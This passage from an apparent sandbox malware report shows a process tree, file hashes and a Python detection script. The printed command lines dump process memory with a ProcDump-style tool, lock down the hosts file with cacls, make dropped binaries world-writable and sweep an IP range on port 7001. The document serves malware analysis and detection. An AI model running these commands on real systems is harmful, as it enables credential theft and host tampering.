                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3504 C:\Windows\TEMP\zthyliniv\3504.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2348
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3964 C:\Windows\TEMP\zthyliniv\3964.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4292
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1408 C:\Windows\TEMP\zthyliniv\1408.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1040
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2516 C:\Windows\TEMP\zthyliniv\2516.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4052
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4812 C:\Windows\TEMP\zthyliniv\4812.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1676
                              • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                                C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3476 C:\Windows\TEMP\zthyliniv\3476.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3140
                               • C:\Windows\SysWOW64\cmd.exe
                                 cmd.exe /c C:\Windows\zthyliniv\eftbbbiir\scan.bat
                                 2⤵
                                 PID:436
                                   • C:\Windows\zthyliniv\eftbbbiir\ysesbhsym.exe
                                     ysesbhsym.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                                     3⤵
                                     • Executes dropped EXE
                                     • Drops file in Windows directory
                                     PID:3972
                               • C:\Windows\SysWOW64\cmd.exe
                                 cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                 2⤵
                                 PID:3296
                                   • C:\Windows\SysWOW64\cmd.exe
                                     C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                     3⤵
                                     • System Location Discovery: System Language Discovery
                                     PID:1280
                                   • C:\Windows\SysWOW64\cacls.exe
                                     cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                     3⤵
                                     • System Location Discovery: System Language Discovery
                                     PID:4628
                                   • C:\Windows\SysWOW64\cmd.exe
                                     C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                     3⤵
                                     • System Location Discovery: System Language Discovery
                                     PID:5024
                                   • C:\Windows\SysWOW64\cacls.exe
                                     cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                     3⤵
                                     • System Location Discovery: System Language Discovery
                                     PID:3984
                                   • C:\Windows\SysWOW64\cmd.exe
                                     C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                     3⤵
                                     PID:4524
                                   • C:\Windows\SysWOW64\cacls.exe
                                     cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                     3⤵
                                     • System Location Discovery: System Language Discovery
                                     PID:1192
                           • C:\Windows\SysWOW64\tyttue.exe
                             C:\Windows\SysWOW64\tyttue.exe
                             1⤵
                             • Executes dropped EXE
                             • System Location Discovery: System Language Discovery
                             • Suspicious use of SetWindowsHookEx
                             PID:3192
                           • C:\Windows\system32\cmd.EXE
                             C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                             1⤵
                             PID:4180
                               • C:\Windows\system32\cmd.exe
                                 C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                 2⤵
                                 PID:4428
                               • C:\Windows\system32\cacls.exe
                                 cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                                 2⤵
                                 PID:2136
                           • C:\Windows\system32\cmd.EXE
                             C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                             1⤵
                             PID:3060
                               • C:\Windows\system32\cmd.exe
                                 C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                 2⤵
                                 PID:4028
                               • C:\Windows\system32\cacls.exe
                                 cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                                 2⤵
                                 PID:936
                           • C:\Windows\system32\cmd.EXE
                             C:\Windows\system32\cmd.EXE /c C:\Windows\ime\lebulsi.exe
                             1⤵
                             PID:4400
                               • C:\Windows\ime\lebulsi.exe
                                 C:\Windows\ime\lebulsi.exe
                                 2⤵
                                 • Executes dropped EXE
                                 • Suspicious use of SetWindowsHookEx
                                 PID:4980
                           • C:\Windows\system32\cmd.EXE
                             C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                             1⤵
                             PID:2912
                               • C:\Windows\system32\cmd.exe
                                 C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                 2⤵
                                 PID:5092
                               • C:\Windows\system32\cacls.exe
                                 cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                                 2⤵
                                 PID:4648
                           • C:\Windows\system32\cmd.EXE
                             C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                             1⤵
                             PID:4060
                               • C:\Windows\system32\cmd.exe
                                 C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                 2⤵
                                 PID:5240
                               • C:\Windows\system32\cacls.exe
                                 cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                                 2⤵
                                 PID:1820
                           • C:\Windows\system32\cmd.EXE
                             C:\Windows\system32\cmd.EXE /c C:\Windows\ime\lebulsi.exe
                             1⤵
                             PID:5884
                               • C:\Windows\ime\lebulsi.exe
                                 C:\Windows\ime\lebulsi.exe
                                 2⤵
                                 • Executes dropped EXE
                                 • Suspicious use of SetWindowsHookEx
                                 PID:4408
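The command lines in this tree carry more detection value than the randomised image names. The dropper runs a ProcDump-style dumper (sadefbibf.exe -accepteula -mp <pid> <pid>.dmp) against a dozen processes, uses cacls to deny users, administrators and SYSTEM access to the hosts file, grants Everyone full control over its own binaries, and sweeps 181.215.0.0/16 for TCP 7001 (WebLogic's default listen port). The Python below is an added example, not part of the sandbox report or of the sample: it applies those four checks to process-creation command lines without looking at the image name, which is the property that survives the renaming. SAMPLE_CMDLINES copies leaf command lines from the tree plus one constructed benign line as a negative control; the rule names and helper names are my own.

```python
"""Detection logic for the behaviours in the process tree above, keyed on
command-line shape rather than image name.  Added example, not from the
sandbox report or the sample; rule names and SAMPLE_CMDLINES are mine."""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: leaf command lines copied from the process tree,
# plus one benign line (notepad) as a negative control.
SAMPLE_CMDLINES = [
    r"C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3848 C:\Windows\TEMP\zthyliniv\3848.dmp",
    r"C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1028 C:\Windows\TEMP\zthyliniv\1028.dmp",
    r"ysesbhsym.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save",
    r"cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM",
    r"cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F",
    r'C:\Windows\system32\cmd.exe /S /D /c" echo Y"',
    r"C:\Windows\system32\notepad.exe C:\Users\user\notes.txt",
]


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str
    cmdline: str


def _procdump_dump(cmd: str) -> Optional[Finding]:
    """ProcDump-style switches: -accepteula, a dump-type switch (-ma/-mp/-mm)
    followed by a PID, and a .dmp output path.  The binary name is ignored on
    purpose; the sample ran it as sadefbibf.exe."""
    toks = cmd.split()
    low = [t.lower() for t in toks]
    if "-accepteula" not in low or not any(t.endswith(".dmp") for t in low):
        return None
    for i, t in enumerate(low):
        if t in ("-ma", "-mp", "-mm") and i + 1 < len(toks) and toks[i + 1].isdigit():
            return Finding("procdump_memory_dump", f"pid={toks[i + 1]}", cmd)
    return None


# cacls/icacls removing access to the hosts file (/D <principal> or /deny <principal>).
_HOSTS_DENY = re.compile(
    r"(?i)\b(?:cacls|icacls)(?:\.exe)?\s+\S*drivers\\etc\\hosts\b.*\s(?:/D|/deny)\s+(?P<who>\S+)"
)
# cacls/icacls granting Everyone full control over an executable.
_EVERYONE_F = re.compile(
    r"(?i)\b(?:cacls|icacls)(?:\.exe)?\s+(?P<path>\S+\.(?:exe|dll|bat|cmd|ps1))\b"
    r".*(?:/p|/grant(?::r)?)\s+everyone:\(?F\)?"
)
# "<proto> <first-ip> <last-ip> <port> ..." as passed to the dropped scanner.
_IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
_RANGE_SCAN = re.compile(
    rf"(?i)\b(?:tcp|udp|syn)\s+(?P<start>{_IPV4})\s+(?P<end>{_IPV4})\s+(?P<port>\d{{1,5}})\b"
)


def _hosts_deny(cmd: str) -> Optional[Finding]:
    m = _HOSTS_DENY.search(cmd)
    return Finding("hosts_file_acl_deny", f"denied={m['who']}", cmd) if m else None


def _world_writable(cmd: str) -> Optional[Finding]:
    m = _EVERYONE_F.search(cmd)
    return Finding("world_writable_binary", f"path={m['path']}", cmd) if m else None


def _range_scan(cmd: str) -> Optional[Finding]:
    m = _RANGE_SCAN.search(cmd)
    if not m:
        return None
    try:
        first, last = ipaddress.IPv4Address(m["start"]), ipaddress.IPv4Address(m["end"])
    except ipaddress.AddressValueError:
        return None
    hosts = int(last) - int(first) + 1  # size of the swept range
    return Finding("ip_range_port_scan", f"port={m['port']} hosts={hosts}", cmd)


DETECTORS = (_procdump_dump, _hosts_deny, _world_writable, _range_scan)


def scan_cmdlines(cmdlines: List[str]) -> List[Finding]:
    """Run every detector over every command line; one Finding per hit."""
    return [f for cmd in cmdlines for det in DETECTORS if (f := det(cmd)) is not None]


if __name__ == "__main__":
    for f in scan_cmdlines(SAMPLE_CMDLINES):
        print(f"{f.rule:24} {f.detail:28} {f.cmdline}")
```

Against a real telemetry source (Sysmon event 1, EDR process creation) the same functions apply unchanged to the CommandLine field; the dump rule fires equally for the genuine procdump64.exe and for any copy of it, which is the point.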

Network

MITRE ATT&CK Enterprise v15
Downloads

• C:\Windows\SysWOW64\Packet.dll
  Filesize 95KB
  MD5 86316be34481c1ed5b792169312673fd
  SHA1 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
  SHA256 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
  SHA512 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

• C:\Windows\SysWOW64\wpcap.dll
  Filesize 275KB
  MD5 4633b298d57014627831ccac89a2c50b
  SHA1 e5f449766722c5c25fa02b065d22a854b6a32a5b
  SHA256 b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
  SHA512 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

• C:\Windows\TEMP\eyuduassi\config.json
  Filesize 693B
  MD5 f2d396833af4aea7b9afde89593ca56e
  SHA1 08d8f699040d3ca94e9d46fc400e3feb4a18b96b
  SHA256 d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
  SHA512 2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

• C:\Windows\TEMP\zthyliniv\1028.dmp
  Filesize 43.8MB
  MD5 79bf9af6f1eeedea89b48423f4f0a82e
  SHA1 2834faba5b05a0c90c5070f5a0e7445002aac8c4
  SHA256 519fffd8f0f00ab4a7770b5773422d85a586ecd6490a256fb62874b59d1bb2f8
  SHA512 42afeb42a524dcefa8caf41f0181e9952e37a0b339812d26acb184dc7168b8dd8bcb37001c1e0d4110f18b77be046bb92f2c17e304329f9c34dc98bff845b1e4

• C:\Windows\TEMP\zthyliniv\1408.dmp
  Filesize 8.7MB
  MD5 72aa249269f7861685af575ef5a6396a
  SHA1 9dbae4bf88ca788164d13ec19f4b741c7c592b83
  SHA256 3f636e517677ea52160b4964a114402754957a11724954429134d1e30fe3472b
  SHA512 a69a68ac3ebc6da4a412f519192a1dceefc9efb307d5b15ce896113be28c2b10c975a03fe62d28421d4c52eb8f20546a54339e06d72b21e3003461ad3f39b64c

• C:\Windows\TEMP\zthyliniv\2120.dmp
  Filesize 4.1MB
  MD5 6f46abc05052f4ab34c805aa56192c09
  SHA1 5a576ee18be79a32fda8c27920ba4531e80c7f9c
  SHA256 96df86c1ad0b2455177eeafdb56a1a3b54bb050e59fa892dd199b3916bdcde36
  SHA512 74eda64619d4d1dfb464531fb24995dd3014c2aec5859bc9555b00678cda037d37b58f286dca4f323c5db58ad9939dff342ed56e734f2aadc35a3583ed5d00bc

• C:\Windows\TEMP\zthyliniv\2516.dmp
  Filesize 2.9MB
  MD5 821f7f00d9a8730711a7c049ecb0334e
  SHA1 15fa1cb6f92e49efd4030d934064a23e27ba57bd
  SHA256 97f345e1f0e9541bd65cf94d56081bb445b402f7320af0ebf48062b4bdc172b7
  SHA512 a18d34320493845e4dd0b002cb2b7c302704e4fee56fc10f9da9f4b1442160da483c530d3cf163592e7030f9e272ba436b7cabf810c5d1d79c2f7928261ee14a

• C:\Windows\TEMP\zthyliniv\2656.dmp
  Filesize 3.6MB
  MD5 0746068e704cc7290723f2a5c7c26f49
  SHA1 e4976972b5eab056c01f4ba5744f559ce7163452
  SHA256 f1211535752fa290718bb6aae4ece782402b77f231e78d3e26ca8563c8a05a6a
  SHA512 5f68b954f2cea8890f8b19ac92dae88a736a6e26873731bb6b83726171a53dce2371a2a91a69d7aa8abc98a6f3c271e9725cae31c5abd072917e9fa2b00cbdf8

• C:\Windows\TEMP\zthyliniv\2748.dmp
  Filesize 2.9MB
  MD5 c6fb35fb4d08d3864d426c652c515f7c
  SHA1 c0cc3dd05cf94f5601663d06b3a496e6bcf0701f
  SHA256 ecd45ea686ebd204f610a979bbf525d426290ee4c602be7a043ffb2af24a3df9
  SHA512 5b067cc3c9995db4b3787b3596a3a9fc5c67613544089d60373677e37e64ca7a9c71d90efa14050a0c3b9e70a5ad212a9075451388c97d1bb3c2d493c008e63d

• C:\Windows\TEMP\zthyliniv\2816.dmp
  Filesize 7.5MB
  MD5 4c6e49a9bcb268b64d03c1b316d66b37
  SHA1 a592e053581fd8e7bc304392c946dc21079d51ff
  SHA256 1acd599d1e1b7d5312e928e84f6af473956395815f73882cfa747b1f697954bc
  SHA512 cb2cb0662e788f7e26a15be9d29e90f0a2b4fa86fcd8568bda29a0d98e7b2417261229ed40fc21a5b912125861aa54b861c2368b86221c020b1859067592ab0c

• C:\Windows\TEMP\zthyliniv\3144.dmp
  Filesize 810KB
  MD5 833522576a20813e84570a1cd4258ba2
  SHA1 cfbede961e1c481392f33455a3c3d83d5275b9f1
  SHA256 625b533c40d868db2750e802e693dc1be765333accccd9be31236433aa27a109
  SHA512 a81a6e00ba2405ae5c7f265a8e38ac36494ba588a5bc8f7989d90aa89a6920cc60d52450dc8474bd546ee630f33302c2dcc97fe175f2c5da8c1f14bed2c2499f

• C:\Windows\TEMP\zthyliniv\336.dmp
  Filesize 33.3MB
  MD5 5ca737de3a3b37e0fd51eaa915e087d8
  SHA1 da1cced1e68e3e9748b67b60cd5931be6a1a7a67
  SHA256 49c88def7f51dad11c88a07b60efbbaec5d89fcf1a3491c4f5812665c52ba3df
  SHA512 776595cca5366079a8fc4657b9d726cb6ee4507531aa6174d70414a53179d418df87f9b6a97231f184ec11d9f26ba5fd991a5ed4416e53615722caff9ec56d10

• C:\Windows\TEMP\zthyliniv\3504.dmp
  Filesize 25.8MB
  MD5 0ed9e8a68dddff457ffc3aa4a64d2ddd
  SHA1 55db7c2f77d2289828936c6351b0db9526279924
  SHA256 ef3d0e562a32126729e2d1057b4b4639c449bbc318bce3909ab7a985110e12ef
  SHA512 d49941692128e8fee9001e68e720cba0737c60250d0d96f934eafcd252fedf10eace287f148d4ed780e06f8129f7831ae56565248ee5a8f9dbe1f0482da25781

• C:\Windows\TEMP\zthyliniv\3848.dmp
  Filesize 2.6MB
  MD5 5a90b7d3aaccfd343720fd786ca52dc7
  SHA1 ca3cf9bef207c33dd5df4b42f1737133c808b8c4
  SHA256 ef19989a5dbe2ce664fa7cd287d940109481f780b57cba6d803628c2b5c2ff3a
  SHA512 3c72423344e3dc35e1f69162de0efc2f7fc09c1851bb5e8b18df4cc7e11f056ea46be63f0550c2057909634ba3e012fe2972d33d5846cb85113409c31ebb5644

• C:\Windows\TEMP\zthyliniv\3940.dmp
  Filesize 20.4MB
  MD5 db667802d89ff5d69d4611dd224a59a6
  SHA1 f4e5b7725e21df8fe6a1c2f7ca96c06459c62c95
  SHA256 bc1196ebc7aecaf48e29ad3bd54b10e20c8c13b351214d811816016810b8cb6e
  SHA512 edf6e568b91f9f22198f905615509b6c6e1687671e9c6b0d839cb41e2119d06f3a9e8b5bfd3997c4d3ad11e9440b928712c1082c9fdb6ced2629a415324d7b0c

• C:\Windows\TEMP\zthyliniv\3964.dmp
  Filesize 1.2MB
  MD5 3668a86a3b055b2ae84a08e8fa8bb335
  SHA1 490edd160fd82d726e26203c6c83d1f955633f1e
  SHA256 604702c51f467750b6cf4d7d154e2d1e748acaeec7d3c0a3a290092674f50a62
  SHA512 2a830d4c973441e213d7ed30582352c210d3f30409929fb95a5f55379ae6d7a9580bf25ccb52b52e5612c6a7c807525f638a465965d52d04ed587a6c2e54ebe8

• C:\Windows\TEMP\zthyliniv\4044.dmp
  Filesize 4.2MB
  MD5 c8f12b0d51823bf0c9dd012e3177dbb9
  SHA1 47542da04c9ac048bc903163f02324c8e93d0b02
  SHA256 98cc8d7240d4376467dc017d364107dc893070db05ca47cf5073d48b5f50cb97
  SHA512 61128610faabb98f517a1bde873a7c3ade6f6b61367f696066c01fc8fd4b8057a3d76adb14807dd1e811430f57e7363723a6021c2d601e26f1af6b6f316f0f6f

• C:\Windows\TEMP\zthyliniv\772.dmp
  Filesize 1019KB
  MD5 dbf4ba23e7826803047df3ba3e64b493
  SHA1 9c877771959605a6de96d6569c214f8237e2904d
  SHA256 01cfed483dfb8a7c610d8768052d594a76efa22e8f4ec0e2ae7e9250e7a018a7
  SHA512 78da00b55e280dce1e7da2bdcff692f84d680ac2646a2176d14d5051923168e3ffae3e1eb047ff0193507e83434ffc23d6596c999eddae98b3404d54d32eb343

• C:\Windows\Temp\eyuduassi\uuetgf.exe
  Filesize 343KB
  MD5 2b4ac7b362261cb3f6f9583751708064
  SHA1 b93693b19ebc99da8a007fed1a45c01c5071fb7f
  SHA256 a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
  SHA512 c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

• C:\Windows\Temp\nsvD459.tmp\System.dll
  Filesize 11KB
  MD5 2ae993a2ffec0c137eb51c8832691bcb
  SHA1 98e0b37b7c14890f8a599f35678af5e9435906e1
  SHA256 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
  SHA512 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

• C:\Windows\Temp\nsvD459.tmp\nsExec.dll
  Filesize 6KB
  MD5 b648c78981c02c434d6a04d4422a6198
  SHA1 74d99eed1eae76c7f43454c01cdb7030e5772fc2
  SHA256 3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
  SHA512 219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                              • C:\Windows\Temp\xohudmc.exe

                                                                Filesize

                                                                72KB

                                                                MD5

                                                                cbefa7108d0cf4186cdf3a82d6db80cd

                                                                SHA1

                                                                73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                                SHA256

                                                                7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                                SHA512

                                                                b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                              • C:\Windows\Temp\zthyliniv\sadefbibf.exe

                                                                Filesize

                                                                126KB

                                                                MD5

                                                                e8d45731654929413d79b3818d6a5011

                                                                SHA1

                                                                23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                SHA256

                                                                a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                SHA512

                                                                df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                              • C:\Windows\seumlgyb\lebulsi.exe

                                                                Filesize

                                                                9.6MB

                                                                MD5

                                                                660bf80555bc6bed61d821aa2941d982

                                                                SHA1

                                                                7910994932bacbfc589a505fad7cbc60a199e647

                                                                SHA256

                                                                9010db1a14b654edd355a1ae1c5b8946e408b8f539658bca584f1083c19a3cc9

                                                                SHA512

                                                                a9baf17765991dc9b62caa19cc83351add8069b06856b0555f7455b7eef869b623744a35398379a384e2cf8d372bdb9e81972edbfdf79e54911875c4a7077d81

                                                              • C:\Windows\system32\drivers\etc\hosts

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                c838e174298c403c2bbdf3cb4bdbb597

                                                                SHA1

                                                                70eeb7dfad9488f14351415800e67454e2b4b95b

                                                                SHA256

                                                                1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                                                SHA512

                                                                c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                                              • C:\Windows\zthyliniv\Corporate\vfshost.exe

                                                                Filesize

                                                                381KB

                                                                MD5

                                                                fd5efccde59e94eec8bb2735aa577b2b

                                                                SHA1

                                                                51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                SHA256

                                                                441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                                SHA512

                                                                74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                              • C:\Windows\zthyliniv\eftbbbiir\Result.txt

                                                                Filesize

                                                                738B

                                                                MD5

                                                                bb7a699d37c5051b2556916d9f962199

                                                                SHA1

                                                                70a2b939562e81b36bc8e920b249254a9f8e5258

                                                                SHA256

                                                                eb948512ee93967773184c0b6dc7e9c11d16743ce66f7c8cfd9f438f178e0183

                                                                SHA512

                                                                bd501d4d086b094b885e283e6a9e8c7ba01d495399e5ff171ccba650b7f3982817afad34d3c24602f90f453cb36488906c955195afe43d2014881e802bac4eac

                                                              • C:\Windows\zthyliniv\eftbbbiir\Result.txt

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                530b9e3f20a414ad03f09110265db005

                                                                SHA1

                                                                48f34fa83dd9c5a04f4e390b13a27596b2ed5316

                                                                SHA256

                                                                f635b9aa7240c275bfe472f09dec212dafa5168d0c49db77302d09b635b800cc

                                                                SHA512

                                                                a5423651ae6b4f2fc662894e6cb4160eba8cba11978242f0ba740ec3e871aa30e3c33c167d1196326f1ece6450cb94da37b67ae600d8751d89c6e9df65517ab7

                                                              • C:\Windows\zthyliniv\eftbbbiir\Result.txt

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                c27f45d2210650a5efe026cc5cb4c5c5

                                                                SHA1

                                                                4afc4a5024ee316f26bfb7c33ccf134236bef98c

                                                                SHA256

                                                                090074334f16f0f280c6d1cbdc231be306b3f7538cf3abb47919432ffa9270cb

                                                                SHA512

                                                                1615c7d112f9924dd6d5eba9e605cd3a578890d5d04854183648952aba00ff4ac5d3b31ca3ecdb11c670e465150a46227e3ee5aa306d292545e2745bbb101477

                                                              • C:\Windows\zthyliniv\eftbbbiir\Result.txt

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                e417b643ee3ea669ba857d074a739cac

                                                                SHA1

                                                                44e1f55b02b344701971faafef44be7c24ee990c

                                                                SHA256

                                                                b11dcc8a1e6fedf17aaadcf3e2c568fb230417a7cb72a9a91c28bdb57ffae698

                                                                SHA512

                                                                1883d39250688437c7d87fc8aab82bc27de78c25025eed90f728161f11e1f68aa927eec6cb65382b6247114463960f1d34f7935e05763d4d68b6cb825a74d46c

                                                              • C:\Windows\zthyliniv\eftbbbiir\Result.txt

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                03cc7d64cade820c9e2f6d82ab5f55f5

                                                                SHA1

                                                                e2975ade69b36b237a8ae1ae8caeea346763af98

                                                                SHA256

                                                                31c421a80be538d067dc6446911e3535d3346a269a42cd303c7b5ac3889e9207

                                                                SHA512

                                                                98b7f78acfb34876d72f4e9f375ed89bc3ff3a66e2925eb9ebea5a6de31b4c9328efb98252e39b7f04374fda2c616f927126093cb48ccbde611ffce86c2e19e6

                                                              • C:\Windows\zthyliniv\eftbbbiir\Result.txt

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                c925d1e526c40eaaae301433c9cd5586

                                                                SHA1

                                                                a94e3ad6032bf358c7a370f2e79e533d49afc0f7

                                                                SHA256

                                                                4502790e986372b62ab590046b5e1352146b61082fe2058ab92b2cab98fd6169

                                                                SHA512

                                                                c7a0a4452caeb91ce8a7327700c577fd4a7c5b99d399195492c13175787c8766b2ef2297ec21bc5833100fa481c9fec867287ccda8dae50be19579dce28bb0fc

                                                              • C:\Windows\zthyliniv\eftbbbiir\Result.txt

                                                                Filesize

                                                                3KB

                                                                MD5

                                                                9b66d86174b42fe40d05fda310e95193

                                                                SHA1

                                                                c6ec96fada7854909e2177ac8aea13540ca44c00

                                                                SHA256

                                                                2e832cc8b5457b1b5b8537a1250f64dc8016d4dddcfb6f941dc6e9355858f866

                                                                SHA512

                                                                b809c46a0ecd5ef563197b3a68f0dcb7e1c6046df1e8497086739762423949c93a62847e1409de824918f7fba18e251e102d40963119d4767c543aac77d3c3aa

                                                              • C:\Windows\zthyliniv\eftbbbiir\Result.txt

                                                                Filesize

                                                                3KB

                                                                MD5

                                                                4e7c8b5d772089f2efc17800d1079ab7

                                                                SHA1

                                                                5ff96484fcb8d4cdd903e7962da48aae2351f5a0

                                                                SHA256

                                                                b6e932248c22a59771f2ce2b8a932bdf7650842a1be927d6a1e052e755aa7691

                                                                SHA512

                                                                bfaabf780d9ee6a8d2017c320288b000890ce58ca516dd0f485c9237f080e78bf6e9e0ce9b89978009d78950878f4948f985993aafb6f1d986d2e422d13f22e6

                                                              • C:\Windows\zthyliniv\eftbbbiir\Result.txt

                                                                Filesize

                                                                3KB

                                                                MD5

                                                                3bd2e6910ba588067bf35e1a55beb06e

                                                                SHA1

                                                                486b35f0dddf1ca44c59696529dd0c17747c9c65

                                                                SHA256

                                                                9d1f7ec0452f40e2a06eb9e7a62de41d7d035ba6785e321e7a4e815648ae7c36

                                                                SHA512

                                                                2a2bd167e8b5885087a8dab5ef04394c066ca7d8f08792650c21885c04672727fed9d57e555a54d3ef921333f567c6cadf6fc353f40d3ab44f0f6f96e589017a

                                                              • C:\Windows\zthyliniv\eftbbbiir\Result.txt

                                                                Filesize

                                                                4KB

                                                                MD5

                                                                a3057ede42f4783547e221bebf8200ba

                                                                SHA1

                                                                4b5cd84575748a9be3ede616292b597976feceae

                                                                SHA256

                                                                ef82e49772360b143df09ff45ad5e7c8f7fca9eb015bb64d5db12d22a404b655

                                                                SHA512

                                                                d17c3105579840b9c59dd15959ca8e8fb3bd213b8ed84ee114ba93d24f69ae2b65a8965db2e2e1882cf30347969993f1400d8309b0ee0db933c9ac87e27fa6e0

                                                              • C:\Windows\zthyliniv\eftbbbiir\Result.txt

                                                                Filesize

                                                                4KB

                                                                MD5

                                                                1d3ec7d6667a4252201950672718f7d9

                                                                SHA1

                                                                3754ea5a3dcd3756ed38ec03fa43f38b0df0dd80

                                                                SHA256

                                                                61b00e36a4b76148df1475ceb4d6f95a271b2bf25901f2b25b9fa21c4f0dfd1f

                                                                SHA512

                                                                922229926a564005fa9feb9fea1fc336add53da84347587d95bd3fd3f7bc9131935fb0b2595a7419c9089ae0372754a7c0d99b089e4f6713b2bfc89ef0a3b1ca

                                                              • C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe

                                                                Filesize

                                                                332KB

                                                                MD5

                                                                ea774c81fe7b5d9708caa278cf3f3c68

                                                                SHA1

                                                                fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                                SHA256

